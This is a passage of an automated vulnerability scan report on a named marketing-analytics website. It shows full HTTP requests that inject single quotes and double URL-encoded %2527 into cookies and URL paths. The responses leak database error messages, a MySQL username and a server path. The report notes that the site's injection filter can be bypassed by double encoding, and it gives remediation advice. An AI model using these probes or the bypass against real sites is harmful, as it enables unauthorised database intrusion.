Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:22:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:22:46 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:22:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:22:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.86. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:40 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:04:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.87. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:25 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:10:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:25 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.88. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.89. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.90. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/113-domain-hostname-content-reports.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:46:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:46:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:46:40 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:46:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.91. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 05:56:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 05:56:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog%2527%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:56:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.92. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
